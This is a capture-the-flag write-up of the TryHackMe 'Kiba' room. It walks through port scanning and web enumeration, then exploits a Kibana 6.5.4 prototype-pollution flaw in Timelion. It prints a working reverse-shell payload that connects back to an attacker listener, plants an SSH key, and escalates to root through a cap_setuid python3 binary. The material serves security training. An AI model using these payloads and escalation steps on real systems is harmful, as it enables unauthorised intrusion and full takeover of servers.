
Kiba CTF WriteUp
by Zebra
Room | Date | Difficulty | Type | Time | Own Intention | Machine |
---|---|---|---|---|---|---|
Kiba | 25.11.2020 | Easy | Challenge | 1,0h | Easy | Linux |
Tasks
Task | Question |
---|---|
Task 1.1 | What is the vulnerability that is specific to programming. |
languages with prototype-based inheritance? | |
Task 1.2 | What is the version of visualization dashboard installed in the server? |
Task 1.3 | What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000 |
Task 1.4 | Compromise the machine and locate user.txt. |
Task 1.5 | Capabilities is a concept that provides a security system that allows “divide” root |
privileges into different values. – autocomplete | |
Task 1.6 | How would you recursively list all of these capabilities? |
Task 1.7 | Escalate privileges and obtain root.txt. |
Introduction
Hello and welcome to the write-up of the room “Kiba” on tryhackme.
Kiba is a room marked as easy and in my opinion its also an easy one. We will start as always do with an nmap scan and web enumeration. The nmap scan of the “standard” port only show a webserver only with a hint for an escalation path. We had to scan all ports to find the right webserver with an application called “kiba”. An exploit with an reverse shell give us access to the server and the opportunity to escalate to root.
So let’s begin:
Preparation Steps
1 2 3 4 5 6 7 8 mkdir kiba #New Room folder cd kiba #Move into folder mkdir nmap #Nmap directory mkdir gobuster #Gobuster directory sudo nano /etc/hosts #$ip kiba.thm export target=10.10.10.10 export golist=/usr/share/seclists/Discovery/Web-Content/common.txt export rockyou=/usr/share/wordlists/rockyou.txt
Scanning and Enumeration
Lets begin with a standard nmap scan for common ports. After that check all ports for don’t let a port pass out of our attention.
Nmap Scan
- Nmap initial scan
- Nmap all ports check
- If necessary fire up a all port scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
$nmap -sC -sV -oN ./nmap/initial kiba.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)
| 256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)
|_ 256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel.
#-sC = Scan with default NSE scripts.
#-sV = Attempts to determine the version of the service running on port.
#-oN = Normal output to the file.
the all port show two ports more.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ nmap -Pn -p- -oN ./nmap/all_ports kiba.thm
$ nmap -sC -sV -p- -oN ./nmap/all_initial kiba.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)
| 256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)
|_ 256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
5044/tcp open lxi-evntsvc?
5601/tcp open esmagent?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| kbn-name: kibana
| GetRequest:
| HTTP/1.1 302 Found
| location: /app/kibana
| kbn-name: kibana
| HTTP/1.1 404 Not Found
| kbn-name: kibana
Port | Service | Information’s |
---|---|---|
22/tcp | ssh | OpenSSH 7.6p1 Ubuntu |
80/tcp | http | Golang net/http server |
5044/tcp | LXi eventsvc | lxi-evntsvc |
5601/tcp | kiba service | kibana web service |
Web Enumeration
Visit web-pages Port 80:
Firefox: kiba.thm
on Port 80
We only find a hint for “linux capabilities”. So lets note this.
Web directory enumeration:
We could use one of our preferred tools like dirbuster, gobuster or dirsearch. I will use gobuster this time.
Gobuster scan:
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o ./web/gobuser_initial
Nothing really interesting.
Visit and enumerate webpage on Port 5601:
Firefox: http://kiba.thm:5601/ -> Redirect to http://kiba.thm:5601/app/kibana#/home?_g=()
gobuster dir -u http://10.10.10.10:5601/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o ./web/5601_initial
Nothing helpful. Manual page enumeration.
Manual enumeration:
Click on the left side through the tasks. At the management Task we find the Version of Kibana.
Then we go over to google and check kibana for exploits. So enter in google kibana 6.5.4 prototype-based inheritance
and kibana 6.5.4 exploit
. We will find the answers for Task 1.1, 1.2 and 1.3.
### Task 1.1, 1.2 and 1.3 solved ###
Exploitation of Kiba:
With our google results we get infos on tenable.com and github. I prefer github so let have a look to the exploit.
To get the exploit running do the following steps:
- Open a listener with
rlwrap nc -lvnp 6666
- Open Kibana
- Past one of the following payload into the timelion visualizer
- Click run
- On the left panel click on Canvas
- Your reverse shell should pop ! :)
The following line get my reverse shell running:
1
2
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/<yourip>/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
-> The reverse shell should connect and we could start the user enumeration.
System enumeration
The get a stable connection i will get a ssh connection running.
@ local:
- generate a ssh keygen with
ssh-keygen
and check with enter. chmod 600 id_rsa
cat id_rsa.pub
@ kiba:
´´´sh cd /home/kibana mkdir .ssh cd .ssh echo “id_rsa.pub output” > authorized_keys```
@ local: ssh -i id_rsa kiba@10.10.10.10
Kibana enumeration (user.txt):
Find user.txt. Go to kibana’s home folder an cat the user.txt. If you don’t find the user.txt use locate user.txt
.
### Task 1.4 solved ###
Privilege escalation:
First we do some manual enumeration with the following commands:
Check for users: cat /etc/passwd | grep home
-> Only user with home directory is kiba
Check cronjobs: cat /etc/crontab
1
2
3
4
5
6
7
8
9
10
11
12
cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root cd /root/ufw && bash ufw.sh
* * * * * kiba cd /home/kiba/kibana/bin && bash kibana
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ls -la /home/kiba/kibana/bin/kibana
-rwxr-xr-x 1 kiba kiba 632 Dec 17 2018 /home/kiba/kibana/bin/kibana
kiba@ubuntu:~$ cat /home/kiba/kibana/bin/kibana
#!/bin/sh
SCRIPT=$0
# SCRIPT may be an arbitrarily deep series of symlinks. Loop until we have the concrete path.
while [ -h "$SCRIPT" ] ; do
ls=$(ls -ld "$SCRIPT")
# Drop everything prior to ->
link=$(expr "$ls" : '.*-> \(.*\)$')
if expr "$link" : '/.*' > /dev/null; then
SCRIPT="$link"
else
SCRIPT=$(dirname "$SCRIPT")/"$link"
fi
done
DIR="$(dirname "${SCRIPT}")/.."
NODE="${DIR}/node/bin/node"
test -x "$NODE" || NODE=$(which node)
if [ ! -x "$NODE" ]; then
echo "unable to find usable node.js executable."
exit 1
fi
NODE_ENV=production exec "${NODE}" $NODE_OPTIONS --no-warnings "${DIR}/src/cli" ${@}
-> Nothing useful here, cause we could not escalate through the root script without write permissions.
Check for SUID binaries: find / -type f -perm -04000 -ls 2>/dev/null
-> Nothing interesting there.
Check for “linux capabilities” (hint from webserver):
1
2
3
4
5
6
getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
### Task 1.5 and 1.6 solved ###
Final step to root
We find our way to go. Use the linux capabilities. Here you will find a link to an explanation by hacktricks. To escalate with python we will use GTFObins() for the escalation command.
1
2
3
4
5
6
7
8
9
10
11
getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
kiba@ubuntu:~$ /home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1000(kiba) groups=1000(kiba),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
# bash -i
root@ubuntu:~# wc -c /root/root.txt
45 /root/root.txt
### Task 1.7 solved ###
What we learned:
- All port scanning with nmap.
- Get information’s and an exploit to an unknown service.
- Escalate via linux capabilities to root.